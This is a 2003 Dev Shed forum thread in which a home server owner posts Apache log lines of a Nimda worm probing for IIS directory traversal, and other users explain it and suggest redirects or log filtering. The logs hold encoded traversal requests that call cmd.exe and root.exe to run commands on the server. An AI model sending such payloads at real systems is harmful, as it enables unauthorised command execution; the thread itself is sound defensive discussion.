Security and Cryptography
 
Forums: » Register « |  User CP |  Games |  Calendar |  Members |  FAQs |  Sitemap |  Support | 
User Name:
Password:
Remember me
Go Back   Dev Shed ForumsSystem AdministrationSecurity and Cryptography

Reply
Add This Thread To:
  Del.icio.us   Digg   Google   Spurl   Blink   Furl   Simpy   Y! MyWeb 
Thread Tools Search this Thread Rate Thread Display Modes
 
Unread Dev Shed Forums Sponsor:
  #1  
Old March 2nd, 2003, 04:38 PM
stevesey10 stevesey10 is offline
Junior Member
Dev Shed Newbie (0 - 499 posts)
 
Join Date: Mar 2003
Posts: 2 stevesey10 User rank is Just a Lowly Private (1 - 20 Reputation Level) 
Time spent in forums: < 1 sec
Reputation Power: 0
Attempted Hack??

Hi

Having just set up a web server on my home computer I was suprised to find this (and several identical) hack attack in my logs. I'm pretty confident I have everything nailed down (but not complacent). Wondered if anyone had any comment about this visitor??

As they originate from blueyonder IP addresses I'm planning to report them.

Steve


80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 212 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:34 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 269 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:34 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:36 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:36 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:36 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"

Reply With Quote
  #2  
Old March 2nd, 2003, 04:51 PM
M.Hirsch M.Hirsch is offline
Contributing User
Dev Shed God 1st Plane (5500 - 5999 posts)
 
Join Date: Oct 2000
Location: Back in the real world.
Posts: 5,969 M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level)M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level)M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level)M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level)M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level)M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level)M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level)M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level) 
Time spent in forums: 1 Month 1 Day 22 h 42 m 50 sec
Reputation Power: 185
Yes, itīs a hack-attempt.
But nothing to be done about it. They happen at least 3-10 times per day at our companyīs web-server (non-public!). Some people are just too lazy to upgrade - you can tell them as often as you want...
this makes the worms on the īnet stay alive

no need to worry if you secured your server.
__________________
--
Manuel Hirsch - Linux, FreeBSD, programming, administration articles, tutorials and more.

Reply With Quote
  #3  
Old March 2nd, 2003, 07:09 PM
delpino delpino is offline
Registered User
Dev Shed Newbie (0 - 499 posts)
 
Join Date: Nov 2001
Location: Broadstairs (UK)
Posts: 17 delpino User rank is Just a Lowly Private (1 - 20 Reputation Level) 
Time spent in forums: 57 m 44 sec
Reputation Power: 0
Send a message via ICQ to delpino
in .htaccess change to prevent server virus from writing false error messages

redirect /scripts http://www.stoptheviruscold.invalid
redirect /MSADC http://www.stoptheviruscold.invalid

Reply With Quote
  #4  
Old March 3rd, 2003, 04:05 AM
stevesey10 stevesey10 is offline
Junior Member
Dev Shed Newbie (0 - 499 posts)
 
Join Date: Mar 2003
Posts: 2 stevesey10 User rank is Just a Lowly Private (1 - 20 Reputation Level) 
Time spent in forums: < 1 sec
Reputation Power: 0
Thanks for info

Further investigation shows it to be a NIMBA virus trying to get to my machine.

I quite like the redirect idea, but not sure what advantage it offers over my own 404 message (my sever is set up with non-standard dir names and very limited access so standard attacks like this shouldn't get anywhere). Any real attack would spot the redirected http address and realise what the target site was doing.

Interestingly did you know you can't rename cmd.exe in win2000. If you do win2000 re-creates it at boot!! Just shows that win 2000 still needs DOS.

Steve

Reply With Quote
  #5  
Old March 3rd, 2003, 02:12 PM
M.Hirsch M.Hirsch is offline
Contributing User
Dev Shed God 1st Plane (5500 - 5999 posts)
 
Join Date: Oct 2000
Location: Back in the real world.
Posts: 5,969 M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level)M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level)M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level)M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level)M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level)M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level)M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level)M.Hirsch User rank is First Lieutenant (10000 - 20000 Reputation Level) 
Time spent in forums: 1 Month 1 Day 22 h 42 m 50 sec
Reputation Power: 185
Quote:
Just shows that win 2000 still needs DOS.

No. This shows that Win2k is trying not to allow you to render the system unusuable. This (the "magic" re-appearing - also if you delete the file) happens with all files in the system and system32 folders (and some more too). itīs called PC-Health and was first introduced on WinME. Win2K and XP have it too, but i think it has another name now.

Reply With Quote
  #6  
Old March 10th, 2003, 05:05 AM
Battery Powered Battery Powered is offline
Contributing User
Dev Shed Newbie (0 - 499 posts)
 
Join Date: Feb 2003
Posts: 161 Battery Powered User rank is Just a Lowly Private (1 - 20 Reputation Level) 
Time spent in forums: 6 h 3 m 57 sec
Reputation Power: 6
This *NIMDA* worm is incredibly popular, alot and i mean alot of people were infected with it a while ago and are still being infected with it,
If your servers secured against this type of intrusion you have nothing to worry about,
the re-direction thing is a good idea for the users sake, most the people who are infected with this (if not all) dont have a clue that they are so by re-directing them to a page explaining what they have on the box and steps to removel could be really appreciated by alot of them

Most the people who are making these types of requests are actually still vulnerable to the attack themselves (are running unpatched boxes) - so anyone can access there machines
Thats why that re-direction thing could be good / helpful
(something i did on my server back ago)

All the best

Reply With Quote
  #7  
Old March 10th, 2003, 08:44 AM
freebsd freebsd is offline
Contributing User
Dev Shed Newbie (0 - 499 posts)
 
Join Date: Jan 2001
Posts: 5 freebsd User rank is Just a Lowly Private (1 - 20 Reputation Level) 
Time spent in forums: < 1 sec
Reputation Power: 0
Nimda/CodeRed doesn't care what Redirect Apache sends, thus, instructing it to redirect to anywhere does not do what you think it would do.
If you just don't want attempts like that to show up in your log, just use SetEnvIf to filter them out. Don't ask me how (I have replied over hundred times on this issue already), just search SetEnvIf under my username.

Reply With Quote
Reply

Viewing: Dev Shed ForumsSystem AdministrationSecurity and Cryptography > Attempted Hack??


Thread Tools  Search this Thread 
Search this Thread:

Advanced Search
Display Modes  Rate This Thread 
Rate This Thread:


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
View Your Warnings | New Posts | Latest News | Latest Threads | Shoutbox
Forum Jump


Forums: » Register « |  User CP |  Games |  Calendar |  Members |  FAQs |  Sitemap |  Support | 
  
 





© 2003-2008 by Developer Shed. All rights reserved. DS Cluster 1 hosted by Hostway
Stay green...Green IT